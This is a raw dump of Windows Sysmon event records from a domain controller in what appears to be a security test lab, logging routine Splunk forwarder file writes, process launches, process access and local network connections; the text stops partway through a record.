23542300x80000000000000002202069Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:51.270{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87D971CFA7E6EB7073F734FE3932EBBA,SHA256=B65EACD792FE5B013CF8952629B5FDB9685C4CDA9FC509E2ED8E73882C275EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202072Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:52.270{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D19D5C05ACCBC48A43CF588C96A7D9E,SHA256=890BC0E815590897A38AFD489F69F22AAF1A4216BE37A190F21C8204A5BF9A79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202071Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:52.176{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62B80695A6233EA009A43B3F653BBE6A,SHA256=0EC3D69A595BACA46E088827E877573834EE4CAFF7079EE55598B36582B544BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202070Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:52.176{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F74C2CD9C7F3AF60A00515AC766405A,SHA256=842757A1A4D27005BC8D832BB91252AFA2CADCEFC6761243972E7C787D4D279D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202074Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:53.301{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA2063CCB03C36B225DB20DA7A0ABE53,SHA256=641474AECC89EE6A5090096012A3074EC78FBE2BB29510F3B1ABB9042E70191F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202073Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:48.950{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60602-false10.0.1.12-8000- 23542300x80000000000000002202075Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:54.348{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7B0959AF789D64510312461F46B0484,SHA256=F79B1EB28517E249BF26ABD9B820E5951B45AC3DA79BECDB30FF8FC9A34DF32D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202076Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:55.348{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB2516E54A48CC9C18145AB50B2B542,SHA256=87C014CF81171C71674434AF03637F9535925305CC8598E79C70C15132D96B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202077Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:56.379{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADD9FDE874C5FD247185E32F2A8AA965,SHA256=DE36725748DF8310C3565BA49A54966D39948CCF6627E30481FD2223279534C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202079Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:57.410{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35750BC5A38B8F498059518A0074C450,SHA256=55116DEDADF32F8CD52EFF766CABDF18C3741A91C1A4C1BAA6ECB149C4F02580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202078Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:57.051{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62B80695A6233EA009A43B3F653BBE6A,SHA256=0EC3D69A595BACA46E088827E877573834EE4CAFF7079EE55598B36582B544BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202084Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:58.754{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D8742B6E921CDFC58899495E22E1EB4,SHA256=5494BB718B9DA07519F0EA385B7811F7C7070407EF29C165BEEC2D634495AE8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202083Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:58.410{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9A080129EFE6004A31D83E6C39751EC,SHA256=795860BBC96E8E88B829ECA9C9241367209E946922E24DA52614284D79289BF9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202082Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:53.981{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60604-false10.0.1.12-8000- 354300x80000000000000002202081Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:53.872{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60603-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002202080Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:53.872{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60603-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002202086Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:59.426{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=443C1D3C26449BE94F743DB4D7B09A52,SHA256=C56B4F38605200E83559A57B676D1357284019F9174928CE3D36582B5EF8E95F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202085Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:55.449{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-228.attackrange.local50928-false10.0.0.2ip-10-0-0-2.us-west-2.compute.internal53domain 23542300x80000000000000002202087Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:00.488{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53415F0772907C4CB90D5336DE9D7CC1,SHA256=FF8A4F503A745491A10E9A4855A6F820E27A172A752F7481FEB6094B74A1E663,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202088Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:01.504{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7113615F03BDF7B01FD728A184BDB844,SHA256=4E96E878A3593D9FD40293DBEF0EE285BACA11816B8BFC5060B4415B0E456DBE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202107Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.957{5ABCFE62-E85A-6040-184E-00000000AD01}67842468C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202106Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.832{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E85A-6040-184E-00000000AD01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202105Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.832{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202104Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.832{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202103Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.832{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202102Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.832{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202101Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.832{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E85A-6040-184E-00000000AD01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202100Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.832{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E85A-6040-184E-00000000AD01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202099Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.833{5ABCFE62-E85A-6040-184E-00000000AD01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202098Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.520{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C52DD75EAFA4878EB040498F2A6662AC,SHA256=AD6B7B51592E088A6B21287600999575E4A29530C1DC78EA22CC4EE3C9C26BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202097Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.238{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75E3B578813B9BA3B9BBB7F283010252,SHA256=8F34AA2451A7D29F7D0017308847421CFE987308ED76A901CA66197F42194030,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202096Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.160{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E85A-6040-174E-00000000AD01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202095Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.160{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202094Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.160{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202093Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.160{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202092Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.160{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202091Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.160{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E85A-6040-174E-00000000AD01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202090Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.160{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E85A-6040-174E-00000000AD01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202089Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:02.161{5ABCFE62-E85A-6040-174E-00000000AD01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program 